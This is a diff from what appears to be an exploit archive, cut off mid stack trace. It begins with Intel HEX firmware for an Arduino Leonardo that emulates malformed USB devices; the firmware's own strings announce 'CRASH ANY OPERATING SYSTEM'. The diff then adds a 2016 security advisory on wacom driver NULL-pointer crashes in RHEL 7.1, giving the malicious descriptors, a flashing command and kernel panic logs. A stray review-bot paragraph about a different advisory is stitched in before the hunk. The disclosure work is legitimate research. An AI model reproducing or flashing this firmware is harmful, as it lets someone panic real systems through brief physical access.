+:1006A000888182230AC0623051F4F8948C91322FF1 +:1006B000309583238C938881822B888304C0F8949F 
+:1006C0008C91822B8C939FBFDF91CF9108950F93D4 +:1006D0001F93CF93DF931F92CDB7DEB7282F30E063 +:1006E000F901E853FF4F8491F901EA51FF4F14914A +:1006F000F901EC5FFE4F04910023C9F0882321F03B +:1007000069830E94F5026981E02FF0E0EE0FFF1F80 +:10071000E05DFE4FA591B4919FB7F8948C91611163 +:1007200003C01095812301C0812B8C939FBF0F9034 +:10073000DF91CF911F910F910895CF93DF93282FD1 +:1007400030E0F901E853FF4F8491F901EA51FF4F7E +:10075000D491F901EC5FFE4FC491CC2391F081114B +:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52 +:10077000A591B4912C912D2381E090E021F480E0AB +:1007800002C080E090E0DF91CF910895615030F099 +:100790002091F100FC0120830196F8CF289884E68F +:1007A00080937D0508951092E900109271051092D2 +:1007B000700590936F0580936E050895FF920F93D7 +:1007C0001F93CF93DF93F82E8B01EA01BA01C80182 +:1007D0000E94A406F80120E030E08EEF2C173D07C0 +:1007E00091F1F7FE02C0A49101C0A0816091700553 +:1007F0007091710540916E0550916F0564177507F2 +:10080000ACF49091E8009570E1F39091E80092FDCE +:100810001CC0A093F100A0917005B09171051196D4 +:10082000AF73BB27AB2B11F48093E800A091700548 +:10083000B09171051196B0937105A09370052F5F6B +:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1 +:10085000CF911F910F91FF9008951F920F920FB6A5 +:100860000F9211246F927F928F929F92AF92BF92BC +:10087000CF92DF92EF92FF920F931F932F933F93AC +:100880004F935F936F937F938F939F93AF93BF9398 +:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1 +:1008A000CDBF1092E9008091E80083FF46C168E067 +:1008B000CE010A960E94C60382EF8093E8009A85D3 +:1008C00097FF05C08091E80080FFFCCF03C08EEF4A +:1008D0008093E800892F807609F023C18B858111F0 +:1008E00005C01092F1001092F10020C1282F2D7F39 +:1008F000213009F41BC1853049F48091E80080FF64 +:10090000FCCF8C8580688093E30010C1863009F0AD +:10091000E1C02D8508891989223009F0B3C0EC8423 +:100920008E2D90E020917305309174058217930706 +:100930000CF09FC00E94D3031F92EF928DE394E0CE +:100940009F938F930E9481068CE0E89E7001112492 +:10095000E0917505F0917605EE0DFF1D89E0DE0151 +:10096000119601900D928A95E1F7C8010E94D30378 +:1009700049E050E0BE016F5F7F4F80E00E94DE03E0 
+:100980000F900F900F900F90C12CD12C612C712CD7 +:1009900033E7A32E34E0B32E4AEA842E44E0942EAB +:1009A000E0917505F0917605EE0DFF1D818590E0D3 +:1009B000681679060CF0BAC07F926F92BF92AF9220 +:1009C0000E948106E0917505F0917605EE0DFF1D00 +:1009D000628573856C0D7D1D49E050E080E00E94CA +:1009E000DE030F900F900F900F9000E010E0E09169 +:1009F0007505F0917605EE0DFF1D0284F385E02D5F +:100A0000EC0DFD1D818590E0081719075CF51F931B +:100A10000F939F928F920E948106E0917505F0914D +:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16 +:100A3000C801880F991FA485B585A80FB91F4D91CE +:100A40005C910284F385E02DE80FF91F60817181CC +:100A500080E00E94DE030F5F1F4F0F900F900F90FA +:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0 +:100A700097CF8FED94E09F938F930E9481060F9004 +:100A80000F9058C0C8012A8B0E94D3032A892130B5 +:100A9000C1F0233009F04EC08C851F928F9389EFEF +:100AA00094E09F938F930E94810642E050E062E8B9 +:100AB00071E080E00E94DE030F900F900F900F9086 +:100AC00035C04091000150E060E071E080E00E949C +:100AD000DE032CC0873071F1883021F481E08093EF +:100AE000F10024C0893011F5937021F5EDE4F1E0B7 +:100AF00081E021E096E38093E9002093EB003491BC +:100B00003093EC009093ED008F5F3196843099F72D +:100B10008EE78093EA001092EA008C85809372053C +:100B200005C0888999890E94D30304C08EEF809301 +:100B3000E80003C081E28093EB0062960FB6F89460 +:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F +:100B5000AF919F918F917F916F915F914F913F9155 +:100B60002F911F910F91FF90EF90DF90CF90BF904A +:100B7000AF909F908F907F906F900F900FBE0F90CF +:100B80001F9018951F920F920FB60F9211248F93FA +:100B90009F938091E1001092E10083FF0FC01092BB +:100BA000E90091E09093EB001092EC0092E39093B7 +:100BB000ED001092720598E09093F00082FF1AC049 +:100BC00080917E05882339F080917E058150809345 +:100BD0007E05882369F080917D05882359F08091F6 +:100BE0007D05815080937D05811104C0289A02C043 +:100BF0005D9AF1CF9F918F910F900FBE0F901F9034 +:100C00001895CF93DF93CDB7DEB782E1FE0135961D +:100C1000A0E0B1E001900D928A95E1F78F89988D5F +:100C20009093760580937505898D9A8D90937405C0 +:100C3000809373058B8D9C8D90937C0580937B05B1 
+:100C40008D8D9E8D90937A05809379058F8D98A1D7 +:100C500090937805809377051092720581E08093D8 +:100C6000D70080EA8093D80082E189BD09B400FEF4 +:100C7000FDCF61E070E080E090E00E94790280E9C1 +:100C80008093D8008CE08093E2001092E000559AA7 +:100C9000209ADF91CF91089581E08093E00008953C +:100CA0009091C80095FFFCCF8093CE0008951092DC +:100CB000CD0087E68093CC0088E18093C9008EE068 +:100CC0008093CA0008950F931F93CF93DF93EC0195 +:100CD0008C01FE0101900020E9F73197EC1BFD0B20 +:100CE000C8018C1B9D0B8E179F0730F4F801819172 +:100CF0008F010E945006EDCFDF91CF911F910F9190 +:100D00000895CF93DF93CDB7DEB7DA950FB6F89499 +:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193 +:100D20009F0160E071E0CE0101960E940507CE01AF +:100D300001960E946306D3950FB6F894DEBF0FBEEE +:100D4000CDBFDF91CF9108958F929F92AF92BF92C6 +:100D5000CF92DF92EF92FF920F931F93CF93DF9387 +:100D600000D0CDB7DEB75B0122E535E03F932F938E +:100D700089839A830E9481068981882E9A81992E7F +:100D80000F900F9000E010E08EE5E82E85E0F82E41 +:100D900091E1C92E94E0D92E0A151B05E4F4F40163 +:100DA00081914F0190E09F938F93FF92EF920E9469 +:100DB00081060F5F1F4FC8018F7099270F900F900A +:100DC0000F900F90892B41F7DF92CF920E948106FE +:100DD0000F900F90E1CF81E194E09F938F930E9459 +:100DE00081060F900F900F900F90DF91CF911F9180 +:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA +:100E00008F900895F8940C94E609AEE0B0E0EBE022 +:100E1000F7E00C94BD098C01CA0146E04C831A83AB +:100E2000098377FF02C060E070E8615071097E833A +:100E30006D83A901BC01CE0101960E9431074D814D +:100E40005E8157FD0AC02F813885421753070CF485 +:100E50009A01F801E20FF31F10822E96E4E00C9441 +:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E +:100E70006B018A01FC0117821682838181FFBDC14B +:100E8000CE0101964C01F7019381F60193FD859106 +:100E900093FF81916F01882309F4ABC1853239F446 +:100EA00093FD859193FF81916F01853229F4B701FC +:100EB00090E00E941909E7CF512C312C20E020321C +:100EC000A0F48B3269F030F4803259F0833269F447 +:100ED00020612CC08D3239F0803339F4216026C076 +:100EE0002260246023C0286021C027FD27C030ED88 +:100EF000380F3A3078F426FF06C0FAE05F9E300DD6 
+:100F00001124532E13C08AE0389E300D1124332E45 +:100F100020620CC08E3221F426FD6BC1206406C015 +:100F20008C3611F4206802C0883641F4F60193FD36 +:100F3000859193FF81916F018111C1CF982F9F7D82 +:100F40009554933028F40C5F1F4FFFE3F9830DC0D5 +:100F5000833631F0833771F0833509F05BC022C0EE +:100F6000F801808189830E5F1F4F44244394512CE4 +:100F7000540115C03801F2E06F0E711CF801A08019 +:100F8000B18026FF03C0652D70E002C06FEF7FEFD8 +:100F9000C5012C870E940E092C0183012C852F7717 +:100FA000222E17C03801F2E06F0E711CF801A080EC +:100FB000B18026FF03C0652D70E002C06FEF7FEFA8 +:100FC000C5012C870E9403092C012C852068222E44 +:100FD000830123FC1BC0832D90E048165906B0F412 +:100FE000B70180E290E00E9419093A94F4CFF5012C +:100FF00027FC859127FE81915F01B70190E00E9457 +:10100000190931103A94F1E04F1A51084114510472 +:1010100071F7E5C0843611F0893639F5F80127FFFC +:1010200007C060817181828193810C5F1F4F08C06E +:1010300060817181882777FD8095982F0E5F1F4F03 +:101040002F76B22E97FF09C0909580957095619587 +:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF +:101060000E944B09A82EA81844C0853729F42F7E6A +:10107000B22E2AE030E025C0F22FF97FBF2E8F3646 +:10108000C1F018F4883579F0B4C0803719F088378A +:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA +:1010A0008460B82E09C024FF0AC09F2F9660B92E15 +:1010B00006C028E030E005C020E130E002C020E1B9 +:1010C00032E0F801B7FE07C06081718182819381AF +:1010D0000C5F1F4F06C06081718180E090E00E5F61 +:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3 +:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0 +:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8 +:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E +:10112000F11D8081803311F4297E09C022FF06C0A1 +:101130007394739404C0822F867809F0739423FD0E +:1011400013C020FF06C05A2C731418F4530C571800 +:10115000732C731468F4B70180E290E02C870E942E +:10116000190973942C85F5CF731410F4371801C046 +:10117000312C24FF12C0B70180E390E02C870E943D +:1011800019092C8522FF17C021FF03C088E590E0D4 +:1011900002C088E790E0B7010CC0822F867859F032 +:1011A00021FD02C080E201C08BE227FD8DE2B70184 +:1011B00090E00E941909A51438F4B70180E390E08B 
+:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F +:1011D0008081B70190E00E941909A110F5CF33205A +:1011E00009F451CEB70180E290E00E9419093A94C7 +:1011F000F6CFF7018681978102C08FEF9FEF2C9683 +:10120000E2E10C94CB09FC010590615070400110A3 +:10121000D8F7809590958E0F9F1F0895FC0161501F +:10122000704001900110D8F7809590958E0F9F1F08 +:1012300008950F931F93CF93DF93182F092FEB017E +:101240008B8181FD03C08FEF9FEF20C082FF10C014 +:101250004E815F812C813D81421753077CF4E881E8 +:10126000F9819F012F5F3F4F39832883108306C088 +:10127000E885F985812F0995892B29F72E813F81F2 +:101280002F5F3F4F3F832E83812F902FDF91CF9190 +:101290001F910F910895FA01AA27283051F12031AA +:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA +:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C +:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A +:1012D000711D811D911DA11D20D009F468943F91BD +:1012E0002AE0269F11243019305D3193DEF6CF01BC +:1012F0000895462F4770405D4193B3E00FD0C9F782 +:10130000F6CF462F4F70405D4A3318F0495D31FDEE +:101310004052419302D0A9F7EACFB4E0A695979541 +:10132000879577956795BA95C9F700976105710517 +:1013300008959B01AC010A2E069457954795379561 +:101340002795BA95C9F7620F731F841F951FA01DBB +:101350000895EE0FFF1F0590F491E02D09942F9250 +:101360003F924F925F926F927F928F929F92AF9235 +:10137000BF92CF92DF92EF92FF920F931F93CF9382 +:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19 +:101390000FBECDBF09942A88398848885F846E843F +:1013A0007D848C849B84AA84B984C884DF80EE8089 +:1013B000FD800C811B81AA81B981CE0FD11D0FB692 +:1013C000F894DEBF0FBECDBFED010895F894FFCFB6 +:1013D0001201000200000040AD0BEFBE000101024F +:1013E000000122034200610064002000420041002D +:1013F00042004500250078002500780025006E0099 +:101400002500700018034200410044002000430002 +:101410003000460046004500450021001201000250 +:1014200000000040C505020000010102030109029D +:10143000270001010000FA0705810304040C0705D9 +:10144000010204000C0705820104000C07000700DC +:101450000700480100500072006F006C00690066D0 +:101460000069006300000A550000006BFD180A00C7 +:10147000809F0AB901312B940A8101128946001319 
+:10148000000257028B0A5E0AF80A5F01F21201009D +:1014900002010000400D055702000101020301B9DD +:1014A0000A0100F80A5F0A810A220342006100640F +:1014B0000020004200410042004500250078002540 +:1014C00000780025006E00250070001803420041DE +:1014D000004400200043003000460046004500451F +:1014E00000210012010002010000400D055702001A +:1014F000010102030109040000030100000003F2DE +:101500000AEC0A0902270001010000FA01AB0A09EE +:101510000400000301000000090200202020202018 +:101520005F5F5F5F5F5F5F5F2020202020202020C3 +:1015300020202020202020202020202020202020AB +:1015400020205F5F5F5F5F205F5F20205F202020A3 +:101550002020205F5F0A0D00202020202F205F5FC9 +:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7 +:101570005F5F20205F5F5F5F5F20202020202F20A3 +:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7 +:10159000202F5F5F0A0D002020202F202F202020E9 +:1015A0002F205F5F205C2F205F5F20602F205F5F18 +:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E +:1015C000205C2F205F5F2F202F205F5F5F2F202F59 +:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D +:1015E0002F202F202F202F5F2F202F202F5F2F2005 +:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4 +:101600002F202F5F2F202F202F5F5F2F202C3C0AB1 +:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B +:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63 +:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8 +:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048 +:101650003C3C2043485241534820414E59204F5072 +:1016600045524154494E472053595354454D203E0D +:101670003E0A0D00203C3C202863292053657267F8 +:10168000656A20536368756D696C6F20323031353F +:101690002C204F70656E536F7572636520536563C0 +:1016A00075726974792052616C66205370656E6E34 +:1016B0006562657267203E3E0A0D000A3E3E20507C +:1016C0007265737320627574746F6E20746F20730B +:1016D0007461727420657865637574696F6E2E2EFF +:1016E0002E0A0D005B44454255475D2045786563F1 +:1016F000757465207061796C6F616420300A0D002B +:10170000526563762D446174613A0A0D005B44456D +:101710004255475D200953656E6420436F6E6669CC +:101720006775726174696F6E446573637269707412 +:101730006F720928696E6465783A2569292E2E2E04 
+:101740000D0A005B44454255475D200953656E64B0
+:1017500020496E74657266616365204465736372C7
+:101760006970746F720928696E7465726661636569
+:101770003A2569292E2E2E0D0A005B444542554715
+:101780005D200953656E6420456E64706F696E74E8
+:101790002044657363726970746F720928656E64A2
+:1017A000706F696E743A2569292E2E2E0D0A005B22
+:1017B00044454255475D203C3C70616E6963206D35
+:1017C0006F64653F3E3E0D0A005B44454255475DF0
+:1017D0002009203E3E20537472696E672044657371
+:1017E00063726970746F72207265717565737420AD
+:1017F0002D2073656E64696E67206D616C666F7213
+:101800006D656420737472696E67212073657475E9
+:10181000702E7756616C75654C203D3D2025690D15
+:101820000A005B48455844554D505D0A0D0025306F
+:04183000325820000A
+:00000001FF
diff --git a/platforms/linux/dos/39538.txt b/platforms/linux/dos/39538.txt
new file mode 100755
index 000000000..82920ec4f
--- /dev/null
+++ b/platforms/linux/dos/39538.txt
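Review bot: The `PDF of advisory:` line in the header of 39537.txt points to `https://os-s.net/advisories/OSS-2016-11_wacom.pdf`, which is the wacom advisory (OS-S 2016-11), while this file is OS-S 2016-12 for digi_acceleport; the same URL is repeated in the 39538.txt wacom advisory added in the next hunk, where it matches, so the link here looks copied over and should name the 2016-12 PDF or be dropped. In the Vendor Communication section, `90-day Responsible Discourse deadline` should read `90-day Responsible Disclosure deadline`. For readers triaging this on a fleet, the kernel log line `usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint descriptors, different from the interface descriptor's value: 0` is logged before the panic and is the only observable precursor the advisory shows, so it is worth calling out as a detection signal next to the stack trace; the advisory itself offers no mitigation beyond the physical-access requirement stated under Severity and Ease of Exploitation.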
@@ -0,0 +1,1184 @@
+OS-S Security Advisory 2016-11
+Linux wacom multiple Nullpointer Dereferences
+
+Date: March 4th, 2016
+Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
+CVE: not yet assigned
+CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
+Title: Multiple Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on
+invalid USB device descriptors (wacom driver)
+Severity: Critical. The Kernel panics. A reboot is required.
+Ease of Exploitation: Trivial
+Vulnerability type: Wrong input validation
+Products: RHEL 7.1 including all updates
+Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
+CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
+Vendor: Red Hat
+Vendor contacted: November, 12th 2015
+PDF of advisory: https://os-s.net/advisories/OSS-2016-11_wacom.pdf
+
+Abstract:
+The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of buggy USB
+device requiring the wacom driver.
+
+Detailed product description:
+We confirmed the bug on the following system:
+RHEL 7.1
+Kernel 3.10.0-229.20.1.el7.x86_64
+Further products or kernel versions have not been tested.
+How reproducible: Always
+Actual results: Kernel crashes.
+
+Description:
+These bugs were found using the USB-fuzzing framework vUSBf from Sergej
+Schumilo
+(github.com/schumilo) using the following device descriptors:
+
+[*] Device-Descriptor #1
+bLength: 0x12
+bDescriptorType: 0x1
+bcdUSB: 0x200
+bDeviceClass: 0x3
+bDeviceSubClass: 0x0
+bDeviceProtocol: 0x0
+bMaxPacketSize: 0x40
+idVendor: 0x56a
+idProduct: 0x3
+bcdDevice: 0x100
+iManufacturer: 0x1
+iProduct: 0x2
+iSerialNumbers: 0x3
+bNumConfigurations: 0x1
+
+This is the configuration descriptor containing the malicious value for
+bNumEndpoints causing the crash. A zero value for bNumEndpoints crashes the
+system.
+
+[*] Configuration-Descriptor
+bLength: 0x9
+bDescriptorType: 0x2
+wTotalLength: 0x27
+bNumInterfaces: 0x1
+bConfigurationValue: 0x1
+iConfiguration: 0x0
+bmAttributes: 0x0
+bMaxPower: 0x31
+[*] Interface-Descriptor
+bLength: 0x9
+bDescriptorType: 0x4
+bInterfaceNumber: 0x0
+bAlternateSetting: 0x0
+bNumEndpoints: 0x0
+bInterfaceClass: 0x0
+bInterfaceSubClass: 0x0
+bInterfaceProtocol: 0x0
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x81
+bmAttribut: 0x3
+wMaxPacketSize: 0x404
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x1
+bmAttribut: 0x2
+wMaxPacketSize: 0x4
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x82
+bmAttribut: 0x2
+wMaxPacketSize: 0x4
+bInterval: 0xc
+
+The wacom driver assumes that there will be at least one endpoint-descriptor.
+If the interface-descriptor contains a zero-value for bNumEndpoints or no
+endpoint-descriptor is provided, the driver tries to dereference a null-
+pointer and the kernel crashes:
+
+****
+$ nm wacom.ko.debug | grep wacom_probe
+00000000000054a0 t wacom_probe
+$ addr2line -e wacom.ko.debug 0x5A22
+/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
+64/drivers/input/tablet/wacom_sys.c:1367
+****
+
+**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/wacom-
+sys.c)
+...
+1308
+1309 endpoint = &intf->cur_altsetting->endpoint[0].desc; /* might be null-
+pointer */
+1310
+...
+1365
+1366 usb_fill_int_urb(wacom->irq, dev,
+1367 usb_rcvintpipe(dev, endpoint->bEndpointAddress), /* possible
+null-pointer dereference */
+1368 wacom_wac->data, features->pktlen,
+1369 wacom_sys_irq, wacom, endpoint->bInterval);
+1370 wacom->irq->transfer_dma = wacom->data_dma;
+...
+****
+
+[*] Device-Descriptor #2
+bLength: 0x12
+bDescriptorType: 0x1
+bcdUSB: 0x200
+bDeviceClass: 0x3
+bDeviceSubClass: 0x0
+bDeviceProtocol: 0x0
+bMaxPacketSize: 0x40
+idVendor: 0x56a
+idProduct: 0x90
+bcdDevice: 0x100
+iManufacturer: 0x1
+iProduct: 0x2
+iSerialNumbers: 0x3
+bNumConfigurations: 0x1
+
+This is the configuration descriptor containing the malicious value for
+bNumEndpoints causing the crash. A zero value for bNumEndpoints crashes the
+system.
+
+[*] Configuration-Descriptor
+bLength: 0x9
+bDescriptorType: 0x2
+wTotalLength: 0x27
+bNumInterfaces: 0x1
+bConfigurationValue: 0x1
+iConfiguration: 0x0
+bmAttributes: 0x0
+bMaxPower: 0x31
+[*] Interface-Descriptor
+bLength: 0x9
+bDescriptorType: 0x4
+bInterfaceNumber: 0x0
+bAlternateSetting: 0x0
+bNumEndpoints: 0x0
+bInterfaceClass: 0x0
+bInterfaceSubClass: 0x0
+bInterfaceProtocol: 0x0
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x81
+bmAttribut: 0x3
+wMaxPacketSize: 0x404
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x1
+bmAttribut: 0x2
+wMaxPacketSize: 0x4
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x82
+bmAttribut: 0x2
+wMaxPacketSize: 0x4
+bInterval: 0xc
+
+The wacom driver assumes that there will be at least one endpoint-descriptor.
+If the interface-descriptor contains a zero-value for bNumEndpoints or no
+endpoint-descriptor is provided, the driver tries to dereference a null-
+pointer and the kernel crashes:
+
+****
+$ nm wacom.ko.debug | grep wacom_probe
+00000000000054a0 t wacom_probe
+$ addr2line -e wacom.ko.debug 0x5756
+/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
+64/drivers/input/tablet/wacom_sys.c:599
+****
+
+**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/wacom-
+sys.c)
+...
+597 error = usb_get_extra_descriptor(interface, HID_DEVICET_HID, &hid_desc);
+598 if (error) {
+599 error = usb_get_extra_descriptor(&interface->endpoint[0], /* possible
+null-pointer dereference */
+600 HID_DEVICET_REPORT, &hid_desc);
+...
+****
+
+Proof of Concept:
+For a proof of concept, we are providing two Arduino Leonardo firmware files.
+These firmware files will emulate defective USB devices.
+
+avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
+flash:w:binary.hex
+
+Firmware files have been attached to this bug report.
+To prevent the automated delivery of the payload, a jumper may be used to
+connect port D3 and 3V3!
+
+Severity and Ease of Exploitation:
+Both vulnerabilities can be easily exploited. Using our Arduino Leonardo
+firmware files, only physical access to the system is required.
+
+Vendor Communication:
+We contacted Red Hat on the November, 12th 2015.
+The upstream driver was recently rebased and thus is not affected.
+RHEL related security patches have been provided, but no CVE number was
+assigned.
+
+References:
+https://bugzilla.redhat.com/show_bug.cgi?id=1283375
+https://bugzilla.redhat.com/show_bug.cgi?id=1283377
+http://www.spinics.net/lists/linux-input/msg42294.html
+
+Kernel Stacktrace #1:
+
+[ 41.611702] usb 1-1: new full-speed USB device number 2 using xhci_hcd
+[ 41.821226] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint
+descriptors, different from the interface descriptor's value: 0
+[ 41.844208] usb 1-1: New USB device found, idVendor=056a, idProduct=0003
+[ 41.849572] usb 1-1: New USB device strings: Mfr=1, Product=2,
+SerialNumber=3
+[ 41.855326] usb 1-1: Product: Ä?
+[ 41.859442] usb 1-1: Manufacturer: Ä?
+[ 41.863456] usb 1-1: SerialNumber: %
+[ 41.916320] BUG: unable to handle kernel NULL pointer dereference at
+0000000000000002
+[ 41.917021] IP: [] wacom_probe+0x582/0xec0 [wacom]
+[ 41.917021] PGD 0
+[ 41.917021] Oops: 0000 [#1] SMP
+[ 41.917021] Modules linked in: wacom(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT
+xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables
+ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle
+ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat
+nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack
+iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm
+ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4
+i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif
+cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy
+dm_mirror dm_region_hash dm_log dm_mod
+[ 41.917021] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
+3.10.0-229.14.1.el7.x86_64 #1
+[ 41.917021] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
+rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
+[ 41.917021] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
+[ 41.917021] RIP: 0010:[] []
+wacom_probe+0x582/0xec0 [wacom]
+[ 41.917021] RSP: 0018:ffff88000bd23b58 EFLAGS: 00010246
+[ 41.917021] RAX: 0000000000000000 RBX: ffff88000c525800 RCX: 0000000000000000
+[ 41.917021] RDX: 0000000000000004 RSI: 0000000000000008 RDI: ffff88000ca75000
+[ 41.917021] RBP: ffff88000bd23be0 R08: 000000000000000d R09: 0000000000000064
+[ 41.917021] R10: 0000000000000064 R11: ffffffff810020d8 R12: ffff88000bcd0090
+[ 41.917021] R13: ffff88000bcd0000 R14: ffff88000c525c20 R15: ffff88000c525c00
+[ 41.917021] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
+knlGS:0000000000000000
+[ 41.917021] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
+[ 41.917021] CR2: 0000000000000002 CR3: 000000000bd05000
CR4:
+00000000000006f0
+[ 41.917021] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
+0000000000000000
+[ 41.917021] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
+[ 41.917021] Stack:
+[ 41.917021] ffff88000bd23bb0 00000000dca45828 ffff88000bcd0090
+0000000000000004
+[ 41.917021] ffff88000bcd0138 0000000000000202 0000000000000001
+0000000000000246
+[ 41.917021] 0000000000000000 ffff88000000000d 0000000000000202
+00000000dca45828
+[ 41.917021] Call Trace:
+[ 41.917021] [] usb_probe_interface+0x1c4/0x2f0
+[ 41.917021] [] driver_probe_device+0x87/0x390
+[ 41.917021] [] __driver_attach+0x93/0xa0
+[ 41.917021] [] ? __device_attach+0x40/0x40
+[ 41.917021] [] bus_for_each_dev+0x73/0xc0
+[ 41.917021] [] driver_attach+0x1e/0x20
+[ 41.917021] [] bus_add_driver+0x200/0x2d0
+[ 41.917021] [] driver_register+0x64/0xf0
+[ 41.917021] [] usb_register_driver+0x82/0x160
+[ 41.917021] [] ? 0xffffffffa03a3fff
+[ 41.917021] [] wacom_driver_init+0x1e/0x1000 [wacom]
+[ 41.917021] [] do_one_initcall+0xb8/0x230
+[ 41.917021] [] load_module+0x133e/0x1b40
+[ 41.917021] [] ? ddebug_proc_write+0xf0/0xf0
+[ 41.917021] [] ?
copy_module_from_fd.isra.42+0x53/0x150
+[ 41.917021] [] SyS_finit_module+0xa6/0xd0
+[ 41.917021] [] system_call_fastpath+0x16/0x1b
+[ 41.917021] Code: 84 0f 08 00 00 48 83 c0 20 48 c7 c7 20 f4 39 a0 49 89 87
+d8 00 00 00 e8 4d f1 26 e1 48 8b 45 b8 41 8b b7 88 00 00 00 49 8b 7f 60 <0f>
+b6 50 02 0f b6 48 06 41 8b 84 24 70 ff ff ff c1 e2 0f c1 e0
+[ 41.917021] RIP [] wacom_probe+0x582/0xec0 [wacom]
+[ 41.917021] RSP
+[ 41.917021] CR2: 0000000000000002
+[ 42.331382] ---[ end trace b239663354a1c556 ]---
+[ 42.336544] Kernel panic - not syncing: Fatal exception
+[ 42.337520] drm_kms_helper: panic occurred, switching back to text console
+
+Kernel Stacktrace #2:
+
+[ 34.781297] usb 1-1: new full-speed USB device number 2 using xhci_hcd
+[ 34.986458] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint
+descriptors, different from the interface descriptor's value: 0
+[ 35.014291] usb 1-1: New USB device found, idVendor=056a, idProduct=0090
+[ 35.021605] usb 1-1: New USB device strings: Mfr=1, Product=2,
+SerialNumber=3
+[ 35.029627] usb 1-1: Product: Ä?
+[ 35.034093] usb 1-1: Manufacturer: Ä?
+[ 35.037368] usb 1-1: SerialNumber: %
+[ 35.091600] BUG: unable to handle kernel NULL pointer dereference at
+0000000000000038
+[ 35.092021] IP: [] wacom_probe+0x2b6/0xec0 [wacom]
+[ 35.092021] PGD 0
+[ 35.092021] Oops: 0000 [#1] SMP
+[ 35.092021] Modules linked in: wacom(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT
+xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables
+ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle
+ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat
+nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack
+iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm
+ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4
+i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif
+cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy
+dm_mirror dm_region_hash dm_log dm_mod
+[ 35.092021] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
+3.10.0-229.14.1.el7.x86_64 #1
